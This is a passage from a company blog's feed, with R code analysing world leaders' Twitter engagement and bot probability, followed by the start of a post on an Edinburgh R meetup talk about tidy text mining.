&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(source, value), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;type, scales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;free&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Source&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Which source is more likely to get more retweets and favourites?&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Values are the mean in each group&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;none&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_text&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;round&lt;/span&gt;(value, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)), colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;inward&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="unnamed-chunk-12-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;Naturally this leads me to the question of which leader, over their previous 2000 tweets, has the most overall retweets and favourites, and who has the highest average number of retweets and favourites?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(name) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(rt_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(retweet_count), fav_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(favorite_count),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rt_mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(retweet_count), fav_mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(favorite_count)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(type, value, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;name) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(name, value), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Mean and total retweets/favourites for each world leader&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;type, scales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;free&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="unnamed-chunk-13-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;What about the mean retweets and favourites per month? &lt;code&gt;ts_plot()&lt;/code&gt; provides us with a quick way to turn the data into a time series plot. However this wouldn’t work for me so I’m doing it the dplyr way. I’m going to a monthly time series so first we need to aggregate our data into months. The function &lt;code&gt;rollback()&lt;/code&gt;, from {lubridate}, is fantastic for this. It will roll a date back to the first day of that month whilst also getting rid of the time information.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twit2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(year_month &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rollback&lt;/span&gt;(created_at, roll_to_first &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, preserve_hms &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(name, year_month) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(fav_mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(favorite_count), rt_mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(retweet_count))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We now have two columns, fav_mean and rt_mean, that have in them the mean number of retweets and favourites for each leader in each month. We can use &lt;code&gt;select()&lt;/code&gt; and &lt;code&gt;gather()&lt;/code&gt; to select the variables we want then turn this into long data for plotting&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twit2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lead_r_twit2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(name, year_month, fav_mean, rt_mean) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(type, value, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;name, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;year_month)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we plot&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twit2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_month, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;type, scales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;free&amp;#34;&lt;/span&gt;, nrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Mean number of favourites/month for world leaders&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="number-of-favs.svg" style="width:550px; class:image-center"&gt;
&lt;h2 id="are-world-leaders-actually-bots"&gt;Are world leaders actually bots?&lt;/h2&gt;
&lt;p&gt;{botrnot} is a fantastic package that uses machine learning to calculate the probability that a twitter user is a bot. So the obvious next question is, are our world leaders a bot or not?&lt;/p&gt;
&lt;p&gt;We need to install the development package from GitHub and we also need to install the GitHub version of {rtweet}&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mkearney/botrnot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mkearney/rtweet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;botrnot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtweet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The only function, &lt;code&gt;botornot()&lt;/code&gt;, works on either given user names, or the output of the &lt;code&gt;get_timelines()&lt;/code&gt; function from {rtweet}. To keep the inline with the rest of the blog, we’re going to use the output we’ve already created from &lt;code&gt;get_timelines()&lt;/code&gt;, stored in &lt;code&gt;lead_r_tl&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;botornot&lt;/span&gt;(lead_r_tl) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(prob_bot)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For a clearer look at the probabilities I’m going to plot them with their actual names instead of the screen names&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bot &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(screen_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; user) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;inner_join&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;distinct&lt;/span&gt;(names), by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;screen_name&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(name, prob_bot) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(prob_bot) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(name, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;prob_bot), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prob_bot), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cornflowerblue&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Probability of being a bot&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;World leader&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Probability of world leaders being a bot&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="prob-twitter-leader-bot.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;So apparently we are almost certain Donald J. Trump isn’t a bot and very very nearly certain the Pope is a bot!&lt;/p&gt;
&lt;p&gt;That’s all for this time, thanks for reading!&lt;/p&gt;
&lt;p&gt;Credit: Photo by &lt;a href="https://unsplash.com/@iliketobike"&gt;L B&lt;/a&gt; on &lt;a href="https://unsplash.com/s/photos/world"&gt;Unsplash&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Edinbr: Text Mining with R</title><link>https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/</link><pubDate>Sat, 24 Feb 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;During a very quick tour of Edinburgh (and in particular some distilleries), &lt;a href="http://www.twitter.com/drob" rel="external"&gt;Dave Robinson&lt;/a&gt; (Tidytext fame), was able to drop by the &lt;a href="http://edinbr.org" rel="external"&gt;Edinburgh R&lt;/a&gt; meet-up group to give a very neat talk on tidy text. The first part of the talk set the scene&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What does does text mean?&lt;/li&gt;
&lt;li&gt;Why make text tidy?&lt;/li&gt;
&lt;li&gt;What sort of problems can you solve?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This was a very neat overview of the topic and gave persuasive arguments around the idea of using a data frame for manipulating text. Most of the details are in Julie’s and his book on &lt;a href="https://www.tidytextmining.com/" rel="external"&gt;Text Mining with R&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-edinbr-text-mining-with-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Personally, I found the second part of his talk the most interesting, where Dave did an “off the cuff” demonstration of a tidy text analysis of the “Scottish play” (see &lt;a href="https://www.youtube.com/watch?v=h--HR7PWfp0" rel="external"&gt;Blackadder&lt;/a&gt; for details on the “Scottish play”).&lt;/p&gt;
&lt;p&gt;After loading a few packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gutenbergr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidytext&amp;#34;&lt;/span&gt;)
